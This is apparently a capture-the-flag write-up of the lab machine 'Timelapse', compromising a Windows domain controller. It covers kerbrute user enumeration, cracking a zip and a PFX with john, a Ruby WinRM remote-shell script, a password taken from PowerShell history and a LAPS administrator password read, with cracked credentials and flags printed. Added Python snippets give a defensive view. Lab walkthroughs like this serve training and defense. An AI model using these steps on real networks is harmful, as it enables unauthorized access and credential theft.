In Timelapse we found a WinRM backup containing a WinRM authentication certificate, which gave us access as a first user. The PowerShell history revealed the password of a second user. Finally, that user belonged to a LAPS-related group, which allowed us to read the administrator password.
Name | Timelapse
OS | Windows
Points | 20
Difficulty | Easy
IP | 10.10.11.152
Maker | ctrlzero
Matrix | Radar chart over Enumeration, Real-Life, CVE, Custom Exploitation, CTF-Like. User Rate: 6, 5.4, 4.5, 5.5, 4.6. Maker Rate: 10, 10, 10, 0, 0.
Recon
nmap
nmap shows multiple open ports: dns (53), kerberos (88), rpc (135), ldap (389), winrm (5986).
# Nmap 7.92 scan initiated Tue Mar 29 19:32:52 2022 as: nmap -p53,88,135,139,389,445,593,636,3268,3269,5986,9389,49667,49674,49696,53230 -sV -sC -oN nmap_scan -Pn 10.10.11.152
Nmap scan report for 10.10.11.152 (10.10.11.152)
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-30 07:32:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-30T07:34:26+00:00; +7h59m58s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49696/tcp open msrpc Microsoft Windows RPC
53230/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-30T07:33:47
|_ start_date: N/A
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 29 19:34:30 2022 -- 1 IP address (1 host up) scanned in 97.61 seconds
RPC/SMB/LDAP
Null sessions did not let us obtain any information over smb, ldap or rpc.
π ~/htb/timelapse ❯ rpcclient -U "" -N 10.10.11.152
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit
π ~/htb/timelapse ❯
π ~/htb/timelapse ❯ crackmapexec smb 10.10.11.152 -u '' -p '' --shares
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\: STATUS_ACCESS_DENIED
SMB 10.10.11.152 445 DC01 [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
π ~/htb/timelapse ❯ crackmapexec ldap 10.10.11.152 -u '' -p ''
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
[.. snip ..]
π ~/htb/timelapse ❯
SMB - Guest
Kerbrute
We used kerbrute to enumerate users with a small wordlist. We found the users administrator and guest.
π ~/htb/timelapse ❯ ./kerbrute userenum --domain timelapse.htb --dc timelapse.htb usernames.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/22 - Ronnie Flathers @ropnop
2022/04/22 20:12:12 > Using KDC(s):
2022/04/22 20:12:12 > timelapse.htb:88
2022/04/22 20:12:17 > [+] VALID USERNAME: administrator@timelapse.htb
2022/04/22 20:16:19 > [+] VALID USERNAME: guest@timelapse.htb
2022/04/22 20:22:11 > Done! Tested 86771 usernames (2 valid) in 599.200 seconds
π ~/htb/timelapse ❯
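A detection-side view of the enumeration above, as an added example (not part of the original write-up): a sliding-window count of Kerberos AS-REQ failures for unknown principals per client address. It assumes failure auditing of the Kerberos Authentication Service is enabled, so that each unknown name is logged as event 4768 with status 0x6; the records, addresses, window and threshold are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN


def build_sample():
    """Constructed 4768 records: (time, event_id, status, user, client_ip)."""
    start = datetime(2022, 4, 22, 20, 12, 12)
    events = []
    # One client asking for 40 different unknown names in 20 seconds.
    for i in range(40):
        events.append((start + timedelta(seconds=i * 0.5), 4768,
                       UNKNOWN_PRINCIPAL, f"name{i}", "192.0.2.10"))
    # Background noise: a mistyped name retried once, then a normal logon.
    events.append((start + timedelta(seconds=3), 4768, UNKNOWN_PRINCIPAL,
                   "jsmiht", "198.51.100.20"))
    events.append((start + timedelta(seconds=9), 4768, UNKNOWN_PRINCIPAL,
                   "jsmiht", "198.51.100.20"))
    events.append((start + timedelta(seconds=15), 4768, "0x0",
                   "jsmith", "198.51.100.20"))
    return sorted(events, key=lambda e: e[0])


def detect_user_enum(events, window=timedelta(seconds=60), threshold=20):
    """Return {client_ip: peak count of distinct unknown names per window}."""
    recent = defaultdict(deque)  # client_ip -> (time, name) inside the window
    alerts = {}
    for ts, event_id, status, user, ip in events:
        if event_id != 4768 or status.lower() != UNKNOWN_PRINCIPAL:
            continue
        queue = recent[ip]
        queue.append((ts, user.lower()))
        # Drop entries that have aged out of the window.
        while ts - queue[0][0] > window:
            queue.popleft()
        # Count distinct names so one repeated typo does not trigger.
        distinct = len({name for _, name in queue})
        if distinct >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), distinct)
    return alerts


if __name__ == "__main__":
    for ip, count in detect_user_enum(build_sample()).items():
        print(f"possible Kerberos user enumeration from {ip}: "
              f"{count} unknown names within 60s")
```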
SMB
Using guest as the user with crackmapexec, we identified the Shares share, on which the user has read permission.
π ~/htb/timelapse ❯ crackmapexec smb timelapse.htb -u guest -p '' --shares
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\guest:
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ Remote Admin
SMB timelapse.htb 445 DC01 C$ Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON Logon server share
SMB timelapse.htb 445 DC01 Shares READ
SMB timelapse.htb 445 DC01 SYSVOL Logon server share
π ~/htb/timelapse ❯
The Shares share contains two folders: \Dev holds a zip file, and \HelpDesk holds several documents and a LAPS installer.
π ~/htb/timelapse ❯ smbclient //timelapse.htb/Shares -u guest
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1625003 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1625003 blocks available
smb: \Dev\> cd ..\HelpDesk
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
6367231 blocks of size 4096. 1625003 blocks available
smb: \HelpDesk\>
User - Legacyy
Backup
The zip file is password protected; we used zip2john to obtain the hash and john to recover the password needed to decompress the files.
π ~/htb/timelapse/shares ❯ zip2john winrm_backup.zip > hash_zip
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
π ~/htb/timelaps/shares ❯ john --wordlist=$ROCK hash_zip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-29 21:41) 2.380g/s 8270Kp/s 8270Kc/s 8270KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
π ~/htb/timelapse/shares ❯
We found a password-protected certificate in PKCS#12 format; we used pfx2john.py to obtain the hash and john to recover the password.
π ~/htb/timelapse/shares ❯ /usr/share/john/pfx2john.py legacyy_dev_auth.pfx > hash_pfx
π ~/htb/timelapse/shares ❯ john --wordlist=$ROCK hash_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:46 DONE (2022-03-29 21:44) 0.02158g/s 69754p/s 69754c/s 69754C/s thuglife06..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
π ~/htb/timelapse/shares ❯
Shell - WinRM SSL
The name of the zip file points to a WinRM backup, so the certificate could be used to authenticate over winrm. We used openssl to extract a certificate and a key.
# Extract the private key
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacy.key
# Extract the certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacy.crt
# Decrypt the private key
openssl rsa -in legacy.key -out legacy-decrypted.key
Using the WinRM library with the certificate and key as described in its SSL documentation, we wrote a small script to authenticate and run commands.
require 'winrm'

# Certificate-based authentication against the WinRM HTTPS listener.
conn = WinRM::Connection.new(
  endpoint: 'https://timelapse.htb:5986/wsman',
  transport: :ssl,
  client_cert: 'legacy.crt',
  client_key: 'legacy-decrypted.key',
  key_pass: 'thuglegacy',
  # Server certificate validation is disabled.
  no_ssl_peer_verification: true
)

command = ''
output = nil
conn.shell(:powershell) do |shell|
  # Read a command, run it remotely, print its output; "exit" or end of input stops the loop.
  until command == "exit\n"
    print 'PS > '
    command = gets || "exit\n"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
After running the script we got a shell as legacyy and the user.txt flag.
π ~/htb/timelapse/shares/cert ❯ ruby shell.rb
PS > whoami
timelapse\legacyy
PS > pwd
Path
----
C:\Users\legacyy\Documents
PS > cd ..\Desktop
PS > dir
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/23/2022 12:12 AM 34 user.txt
PS > type user.txt
86914b213ba97b81f82c930a156f3d75
PS >
User - svc_deploy
After running WinPEAS we found that a PowerShell history file exists.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 434B
The file contains several commands, including an Invoke-Command call that uses the credentials of the svc_deploy user to connect to WinRM on localhost, port 5986.
PS > type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
PS >
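An audit-side illustration of the finding above, as an added example (not code from the original write-up): a scanner for PSReadLine history content that flags secrets passed to ConvertTo-SecureString -AsPlainText, links each one to the account named in the PSCredential constructor, and flags session options that disable certificate checks. The history text, account name and secret are constructed placeholders, and the regular expressions cover only the command forms shown on this page.

```python
import re

# Constructed history content following the pattern shown above;
# the account name and the secret are placeholders.
SAMPLE_HISTORY = r"""whoami
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER-not-a-real-secret' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
exit
"""

# $var = ConvertTo-SecureString '<literal>' ... -AsPlainText
SECURE = re.compile(
    r"""(\$\w+)\s*=\s*ConvertTo-SecureString\s+(?:-String\s+)?(['"])(.+?)\2\s.*?-AsPlainText""",
    re.IGNORECASE)
# New-Object ...PSCredential ('<account>', $secretVar)
CRED = re.compile(
    r"""New-Object\s+(?:-TypeName\s+)?[\w.]*PSCredential\s*\(?\s*(['"])(.+?)\1\s*,\s*(\$\w+)""",
    re.IGNORECASE)
SKIP_TLS = re.compile(r"-Skip(?:CACheck|CNCheck|RevocationCheck)\b",
                      re.IGNORECASE)


def scan_history(text):
    """Return findings for plaintext credentials and disabled TLS checks."""
    findings = []
    by_variable = {}  # secret variable -> its finding, to attach the account
    for lineno, line in enumerate(text.splitlines(), start=1):
        secure = SECURE.search(line)
        cred = CRED.search(line)
        if secure:
            finding = {"line": lineno, "issue": "plaintext-securestring",
                       "account": None,
                       # Report only the length so the audit does not re-leak it.
                       "secret": f"<{len(secure.group(3))} chars redacted>"}
            by_variable[secure.group(1).lower()] = finding
            findings.append(finding)
        elif cred and cred.group(3).lower() in by_variable:
            # The credential object binds the earlier secret to an account.
            by_variable[cred.group(3).lower()]["account"] = cred.group(2)
        elif SKIP_TLS.search(line):
            findings.append({"line": lineno, "issue": "tls-validation-disabled",
                             "account": None, "secret": None})
    return findings


if __name__ == "__main__":
    for item in scan_history(SAMPLE_HISTORY):
        print(item)
```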
We reused the same command, running whoami.
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck;
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force;
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p);
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock { whoami }
After running it we can see that these credentials give us access as svc_deploy.
PS > $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck; $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force; $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p); invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock { whoami }
timelapse\svc_deploy
PS >
Shell
We modified the Ruby script to use the credentials we found.
π ~/htb/timelapse/shares/cert ❯ cat svc_shell.rb
require 'winrm'

# Password authentication as svc_deploy; the certificate options stay commented out.
conn = WinRM::Connection.new(
  endpoint: 'https://timelapse.htb:5986/wsman',
  user: 'svc_deploy',
  password: 'E3R$Q62^12p7PLlC%KWaxuaV',
  transport: :ssl,
  # client_cert: 'legacy.crt',
  # client_key: 'legacy-decrypted.key',
  # key_pass: 'thuglegacy',
  # Server certificate validation is disabled.
  no_ssl_peer_verification: true
)

command = ''
output = nil
conn.shell(:powershell) do |shell|
  # Read a command, run it remotely, print its output; "exit" or end of input stops the loop.
  until command == "exit\n"
    print 'PS > '
    command = gets || "exit\n"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
We got a shell as the svc_deploy user.
π ~/htb/timelapse/shares/cert ❯ ruby svc_shell.rb
PS > whoami
timelapse\svc_deploy
PS > pwd
Path
----
C:\Users\svc_deploy\Documents
PS >
Privesc
Enumerating the svc_deploy user's information, we see that it belongs to the LAPS_Readers group, which could be related to the installer found over SMB.
PS C:\> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
whoami : ERROR: Unable to get user claims information.
At line:1 char:1
+ whoami /all
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (ERROR: Unable t...ms information.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
PS C:\>
LAPS
After some research we found a post about LAPS describing a scenario in which a user without administrative permissions but with read permission on LAPS can read the password of a local administrator user. After running the command shown there, we see the password for the computer DC01.
PS > Get-ADComputer dc01 -Properties ms-mcs-AdmPwd, ms-mcs-AdmPwdExpirationTime, canonicalname
CanonicalName : timelapse.htb/Domain Controllers/DC01
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-AdmPwd : 6i4pJlu)-6B1n(132tD+3t+5 <------
ms-mcs-AdmPwdExpirationTime : 132956035317974980
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
PS >
Likewise, the password can be obtained with crackmapexec and its laps module.
π ~/htb/timelapse ❯ crackmapexec ldap timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' --kdcHost timelapse.htb -M laps
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP timelapse.htb 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS timelapse.htb 389 DC01 [*] Getting LAPS Passwords
LAPS timelapse.htb 389 DC01 Computer: DC01$ Password: 6i4pJlu)-6B1n(132tD+3t+5
π ~/htb/timelapse ❯
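The ms-mcs-AdmPwdExpirationTime value in the output above is a Windows FILETIME; this added example (not part of the original write-up) decodes it and classifies a small export of such values, which shows how long a disclosed LAPS password remains valid. Only the DC01$ value comes from the page; the other entries, the export layout and the reference date are constructed assumptions.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# ms-mcs-AdmPwdExpirationTime values keyed by computer account. DC01$ is the
# value shown in the output above; the other two entries are constructed.
SAMPLE_EXPORT = {
    "DC01$": 132956035317974980,
    "WS01$": 132900000000000000,
    "WS02$": None,  # attribute absent
}


def filetime_to_utc(ticks):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC)."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ticks) // 10)


def laps_status(ticks, now):
    """Classify one expiration value relative to the reference time `now`."""
    if ticks is None:
        return {"state": "not-set", "expires": None, "days_left": None}
    expires = filetime_to_utc(ticks)
    days_left = (expires - now).days
    state = "expired" if expires <= now else "valid"
    return {"state": state, "expires": expires, "days_left": days_left}


def audit(export, now):
    """Return {computer: status} so overdue or unset hosts stand out."""
    return {name: laps_status(ticks, now) for name, ticks in export.items()}


if __name__ == "__main__":
    reference = datetime(2022, 4, 23, tzinfo=timezone.utc)  # assumed audit date
    for name, status in audit(SAMPLE_EXPORT, reference).items():
        print(name, status["state"], status["expires"], status["days_left"])
```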
Shell
We can see that the credentials give us access to all the shares.
π ~/htb/timelapse ❯ crackmapexec smb timelapse.htb -u administrator -p '6i4pJlu)-6B1n(132tD+3t+5' --shares
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\administrator:6i4pJlu)-6B1n(132tD+3t+5 (Pwn3d!)
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB timelapse.htb 445 DC01 C$ READ,WRITE Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON READ,WRITE Logon server share
SMB timelapse.htb 445 DC01 Shares READ,WRITE
SMB timelapse.htb 445 DC01 SYSVOL READ Logon server share
π ~/htb/timelapse ❯
We again used a Ruby script, this time with the administrator user's credentials, obtaining a shell and the root.txt flag.
π ~/htb/timelapse/shares/cert ❯ ruby admin_shell.rb
PS > whoami
timelapse\administrator
PS > pwd
Path
----
C:\Users\Administrator\Documents
PS > dir ..\Desktop
PS > dir ..\..\
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
PS > cd ..\..\TRX\Desktop
PS > dir
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/23/2022 12:12 AM 34 root.txt
PS > type root.txt
3a2f63973573a40d5ae3185f8a110257
PS >